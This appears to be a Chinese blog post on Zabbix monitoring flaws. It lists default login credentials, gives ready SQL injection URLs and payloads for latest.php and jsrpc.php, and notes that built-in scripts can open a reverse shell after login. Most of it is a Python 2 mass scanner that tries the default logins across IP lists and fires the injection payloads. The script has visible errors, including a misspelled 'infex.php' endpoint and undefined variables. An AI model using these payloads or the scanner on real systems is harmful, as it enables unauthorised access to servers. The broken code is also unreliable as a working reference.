一、zabbix:
zabbix是监控是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。zabbix能监视各种网络参数,保证服务器系统的安全运营;并提供灵活的通知机制以让系统管理员快速定位/解决存在的各种问题。
二、Zabbix漏洞:
1、弱口令:
1 WeapPassword = [("admin","zabbix"),("Admin","zabbix"),("guest","")]
2、SQL注入
(1)
标题:latest.php处toogle_ids[]参数SQL注入
攻击条件:登陆后
危害:可获取系统权限
URL以及payload:
1 """ 2 http://a.b.c.d/latest.php?output=ajax&sid=登录后的sessionid的后16位&favobj=toggle&toggle_open_state=1&toggle_ids[]=15385); select * from users where (1=1 3 """
(2)
标题:jsrpc.php处profileIdx2参数SQL注入
攻击条件:无需登录,亦可以登录后使用高权限的sid、cookie进行替换
危害:一般SQL注入危害
URL以及payload:
1 """ 2 http://a.b.c.d/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1 3 """
(3)
标题:其他SQL注入漏洞:chart_bar.php处itemid参数和periods参数SQL注入;httpmon.php处applications参数SQL注入
攻击条件:不详
危害:不详
URL以及payload:一般SQL注入payload尝试
3、OS命令注入执行:
(1)弱口令登录后,使用zabbix自带的Script执行系统命令可以反弹shell等等
(2)防御:
#不要设置AllowRoot=1,避免agent和server以root权限启动。
#进制agent执行system.run,不要设置EnableRemoteCommands=1。
#即使打补丁。
4、自己写的一个python检查脚本:有问题及时喷我
1 #!/usr/bin/env python 2 # -*- coding:utf-8 -*- 3 """ 4 This Python Script Is For "Zabbix" VulnScan! 5 Author:ChenRan 6 Company:360.net 7 """ 8 9 # import lib files 10 import os 11 import sys 12 import time 13 import logging 14 import datetime 15 import requests 16 import threading 17 from bs4 import BeautifulSoup 18 from optparse import OptionParser 19 20 #global varites define 21 ZabbixTarget = None#target ip address! 22 ZabbixFile = None#target ip address file 23 BlackList = [ 24 'incorrect', 25 '<!-- Login Form -->' 26 ] 27 28 #global config set 29 logging.basicConfig(level=logging.INFO,format='%(message)s') 30 31 #global function defines: 32 def Config_Init(): 33 """ 34 Take "http://" to the ip address to create targeturl! 35 """ 36 global ZabbixTarget 37 global ZabbixFile 38 if ZabbixTarget != None: 39 target = "http://%s"%ZabbixTarget 40 return [target] 41 elif ZabbixFile != None: 42 targetlist = [] 43 with open(ZabbixFile,"r") as fr: 44 for ip in fr.readlines(): 45 ip = ip.split(" ")[0].split(" ")[0] 46 target = "http://%s"%str(ip) 47 targetlist.append(target) 48 return targetlist 49 else: 50 return [] 51 52 def get_post_data(page_content): 53 """ 54 from response html get post data! 55 """ 56 postdata = {} 57 soup = BeautifulSoup(page_content, "html.parser") 58 for inputparameter in soup.find_all('input'): 59 if 'value' in inputparameter.attrs and 'name' in inputparameter.attrs: 60 postdata[inputparameter['name']] = inputparameter['value'] 61 return postdata 62 63 def report_file_allinone(): 64 vulnlist = [] 65 scantime = str(datetime.datetime.now()) 66 for parents,dirs,filenames in os.walk("./"): 67 for filename in filenames: 68 if filename.find("zabbix_vulnscan_result") >= 0: 69 with open(filename,"r") as fr: 70 vulnlist.extend(fr.readlines()) 71 os.remove(filename) 72 with open("zabbix_vuln_report_%s.csv"%str(datetime.date.today()),"w") as fw: 73 fw.write("vuln-IP,Vuln-Type,Scan-Time ") 74 for line in vulnlist: 75 fw.write(line) 76 77 #Zabbix Scan Class Defines 78 class ZabbixScan: 79 def __init__(self,targetlist): 80 """ 81 #class column init! 82 VulnExpPHPFile: 83 //0-login-weakpassword 84 //1-httpmon.php parameter->applicationos 85 //2-chart_bar.php parameter->itemid 86 //3-jsrpc.php parameter->profileIdx2 87 //4-latest.php parameter->toggle_ids[] 88 //5-OS_Injection->When you login the system you can run you scripts! 89 TestTarget: 90 //0-login-weakpassword 91 //1-jsrpc.php 92 //2-latest.php 93 """ 94 self._weakpassword = [{"username":"Admin","password":"zabbix"},{"username":"admin","password":"zabbix"},{"username":"guest","password":""}] #default password directionary! 95 self._targetlist = targetlist #wait for scan target! 96 self._size = len(self._targetlist)#size of scan target! 97 self._sqlinjectionurl1_vulnlist = [] 98 self._sqlinjectionurl2_vulnlist = [] 99 self._login_weakpassword_vulnlist = [] 100 self._login_weakpassword_safelist = [] 101 102 def __del__(self): 103 del self._weakpassword 104 del self._targetlist 105 del self._size 106 del self._sqlinjectionurl1_vulnlist 107 del self._sqlinjectionurl2_vulnlist 108 del self._login_weakpassword_vulnlist 109 del self._login_weakpassword_safelist 110 111 def __len__(self): 112 """return size of targetlist""" 113 return self._size 114 115 def _scan_default_password_login(self): 116 for authinfo in self._weakpassword: 117 user = authinfo["username"] 118 pswd = authinfo["password"] 119 for target in self._targetlist: 120 logging.info("[*] Target:%s Payload:%s"%(str(target),str(authinfo))) 121 headers = { 122 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 123 } 124 request = requests.session() 125 try: 126 response = request.get(target,headers=headers,timeout=3) 127 except Exception,ex: 128 self._login_weakpassword_safelist.append(target) 129 continue 130 if response.status_code != 200: 131 self._login_weakpassword_safelist.append(target) 132 continue 133 postdata = get_post_data(response.content) 134 headers["Referer"]=target 135 postdata["user"] = user 136 postdata["password"] = pswd 137 try: 138 response = request.post(target+"/index.php",headers=headers,data=postdata,timeout=3) 139 except Exception,ex: 140 self._login_weakpassword_safelist.append(target) 141 continue 142 if "chkbxRange.init();" in response.content: 143 for flagstring in BlackList: 144 if flagstring in response.content: 145 self._login_weakpassword_safelist.append(target) 146 self._login_weakpassword_vulnlist.append((target,user,pswd)) 147 else: 148 self._login_weakpassword_safelist.append(target) 149 request.close() 150 151 def _sqlinjectionurl1_scan(self): 152 logging.info("[*] latest.php sqlinjection scan!") 153 for vulntarget in self._login_weakpassword_vulnlist: 154 target = vulntarget[0] 155 user = vulntarget[1] 156 pswd = vulntarget[2] 157 request = requests.session() 158 headers = { 159 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 160 } 161 try: 162 response = request.get(target,headers=headers,timeout=3) 163 except Exception,ex: 164 continue 165 postdata = get_post_data(response.content) 166 postdata["user"] = user 167 postdata["password"] = pswd 168 headers["Referer"]=target 169 try: 170 response = request.post(target+"/infex.php",headers=headers,data=postdata,timeout=3) 171 except Exception,ex: 172 continue 173 sessionid = response.cookie.values()[0][-16:] 174 scanurl = target +"/latest.php?output=ajax&sid=%s&favobj=toggle&toggle_open_state=1&toggle_ids[]=1%^&*%22%27()-*#"%str(sessionid) 175 try: 176 response = request.get(scanurl,timeout=20) 177 except Exception,ex: 178 continue 179 if "SQL syntax" in repsonse: 180 self._sqlinjectionurl1_vulnlist.append(vulntarget) 181 else: 182 request.close() 183 184 def _sqlinjectionurl2_scan(self): 185 logging.info("[*] jsrpc.php sqlinjection scan!") 186 for vulntarget in self._targetlist: 187 scanurl = vulntarget + "/jsrpc.php?type=9&method=screen.get×tamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17" 188 headers = { 189 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 190 } 191 try: 192 response = request.get(url,headers=headers,timeout=20) 193 except Exception,ex: 194 continue 195 if "ed733b8d10be255eceba344d533586" in response.content: 196 self._sqlinjectionurl2_vulnlist.append(vulntarget) 197 else: 198 pass 199 200 def scan_run(self): 201 self._scan_default_password_login() 202 self._sqlinjectionurl1_scan() 203 self._sqlinjectionurl2_scan() 204 205 class scanthread(threading.Thread): 206 def __init__(self,threadname,targetlist): 207 threading.Thread.__init__(self,name=threadname) 208 self.scanner = ZabbixScan(targetlist) 209 self.name = threadname 210 self.targetlist = targetlist 211 def _create_csv(self): 212 scantime = str(datetime.datetime.now()) 213 with open("zabbix_vulnscan_result_%s_%s"%(str(time.time()),str(self.name)),"w") as fw: 214 for vuln in self.scanner._login_weakpassword_vulnlist: 215 target = vuln[0].split("http://")[-1] 216 vulntype = "weakpassword" 217 vulnstring = "%s,%s,%s "%(str(target),vulntype,scantime) 218 fw.write(vulnstring) 219 for vuln in self.scanner._sqlinjectionurl1_vulnlist: 220 target = vuln[0].split("http://")[-1] 221 vulntype = "latest.php-SQLI" 222 vulnstring = "%s,%s,%s "%(str(target),vulntype,scantime) 223 fw.write(vulnstring) 224 for vuln in self.scanner._sqlinjectionurl1_vulnlist: 225 target = target.split("http://")[-1] 226 vulntype = "jsrpc.php-SQLI" 227 vulnstring = "%s,%s,%s "%(str(target),vulntype,scantime) 228 fw.write(vulnstring) 229 def run(self): 230 #logging.info("[*] %s running!"%self.name) 231 #logging.info("[*] %s MyTarget:%s"%(str(self.name),str(self.targetlist))) 232 self.scanner.scan_run() 233 self._create_csv() 234 #logging.info("[*] %s finished!"%self.name) 235 236 if __name__ == "__main__": 237 logging.info("[+]*****************************************************************[+]") 238 logging.info("Zabbix Scan Init!") 239 parser = OptionParser() 240 parser.add_option("-i","--iptarget",dest="iptarget",help="Target IP address!") 241 parser.add_option("-f","--iptargetfile",dest="iptargetfile",help="Target IPs file!") 242 parser.add_option("-t","--threadnum",dest="threadnum",help="Number of Added Threads to Scan!") 243 (options, args) = parser.parse_args() 244 parameterchecklist = [options.iptarget,options.iptargetfile] 245 if parameterchecklist in [[None,None],[None,""],["",None],["",""]]: 246 logging.error("[-] Target parameters error!") 247 exit(0) 248 try: 249 options.threadnum = 1 if options.threadnum == None or options.threadnum == "" else int(options.threadnum) 250 except Exception,ex: 251 logging.error("[-] Threadnum parameter error!") 252 exit(0) 253 [ZabbixTarget,ZabbixFile] = parameterchecklist 254 logging.info("[+] Scan Config Init!") 255 targetlist = Config_Init() 256 targetsize = len(targetlist) 257 logging.info("[+] Scan Target Number:%s"%str(targetsize)) 258 logging.info("[+] Scan Threads Init") 259 threadtargetsize = targetsize/options.threadnum 260 devidestart = 0 261 devideend = threadtargetsize 262 threadlist = [] 263 nameflag = 0 264 while True: 265 threadname = "scan-thread-%s"%str(nameflag) 266 nameflag += 1 267 if devideend < targetsize: 268 threadtargetlist = targetlist[devidestart:devideend] 269 threadlist.append(scanthread(threadname,threadtargetlist)) 270 devidestart += threadtargetsize 271 devideend += threadtargetsize 272 elif devidestart <= targetsize: 273 threadtargetlist = targetlist[devidestart:] 274 threadlist.append(scanthread(threadname,threadtargetlist)) 275 devidestart += threadtargetsize 276 devideend += threadtargetsize 277 else: 278 break 279 280 logging.info("[+] Scan Thread Start!") 281 for thread in threadlist: 282 thread.start() 283 time.sleep(2) 284 logging.info("[+] %s --Start!"%thread.name) 285 for thread in threadlist: 286 thread.join() 287 logging.info("[+] Scan Finished!") 288 logging.info("[+] Report Creating!") 289 report_file_allinone() 290 logging.info("[+] Report Create!") 291 exit(0) 292 293 294